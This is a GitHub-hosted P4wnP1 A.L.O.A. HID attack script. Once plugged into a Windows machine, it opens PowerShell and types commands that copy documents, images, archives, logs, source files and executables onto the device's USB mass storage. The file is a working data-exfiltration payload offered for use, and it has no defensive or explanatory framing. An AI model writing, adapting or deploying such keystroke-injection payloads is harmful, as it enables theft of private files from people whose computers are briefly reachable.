-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathexfiltrate-files-and-documents.txt
92 lines (75 loc) · 2.11 KB
/
exfiltrate-files-and-documents.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
// This payloads copy : txt, pdf, python, html, log, zip files to the UMS of P4wnP1 A.L.O.A.
// do not forget to deploy the UMS (USB MASS STORAGE)
//
//
layout('fr') //set layout fr
press("GUI r") // windows + r
delay(500)
type("powershell\n") // write powershell and press "enter"
delay(1000)
type("copy *.txt d:\n") //exflitre .txt file
type("copy *.txt e:\n")
type("copy *.txt f:\n")
type("copy *.txt g:\n")
type("copy *.txt h:\n")
type("copy *.pdf d:\n") //exflitre .pdf file
type("copy *.pdf e:\n")
type("copy *.pdf f:\n")
type("copy *.pdf g:\n")
type("copy *.pdf h:\n")
type("copy *.odt d:\n") //exflitre .odt file
type("copy *.odt e:\n")
type("copy *.odt f:\n")
type("copy *.odt g:\n")
type("copy *.odt h:\n")
type("copy *.zip d:\n") //exflitre .zip file
type("copy *.zip e:\n")
type("copy *.zip f:\n")
type("copy *.zip g:\n")
type("copy *.zip h:\n")
type("copy *.log d:\n") //exflitre .log file
type("copy *.log e:\n")
type("copy *.log f:\n")
type("copy *.log g:\n")
type("copy *.log h:\n")
type("copy *.zip d:\n") //exflitre .zip file
type("copy *.zip e:\n")
type("copy *.zip f:\n")
type("copy *.zip g:\n")
type("copy *.zip h:\n")
type("copy *.stl d:\n") //exflitre .stl file
type("copy *.stl e:\n")
type("copy *.stl f:\n")
type("copy *.stl g:\n")
type("copy *.stl h:\n")
type("copy *.exe d:\n") //exflitre .exe file
type("copy *.exe e:\n")
type("copy *.exe f:\n")
type("copy *.exe g:\n")
type("copy *.exe h:\n")
type("copy *.png d:\n") //exflitre .png file
type("copy *.png e:\n")
type("copy *.png f:\n")
type("copy *.png g:\n")
type("copy *.png h:\n")
type("copy *.jpg d:\n") //exflitre .jpg file
type("copy *.jpg e:\n")
type("copy *.jpg f:\n")
type("copy *.jpg g:\n")
type("copy *.jpg h:\n")
type("copy *.html d:\n") //exflitre .html file
type("copy *.html e:\n")
type("copy *.html f:\n")
type("copy *.html g:\n")
type("copy *.html h:\n")
type("copy *.css d:\n") //exflitre .css file
type("copy *.css e:\n")
type("copy *.css f:\n")
type("copy *.css g:\n")
type("copy *.css h:\n")
type("copy *.c d:\n") //exflitre .css file
type("copy *.c e:\n")
type("copy *.c f:\n")
type("copy *.c g:\n")
type("copy *.c h:\n")
type("exit\n") //exit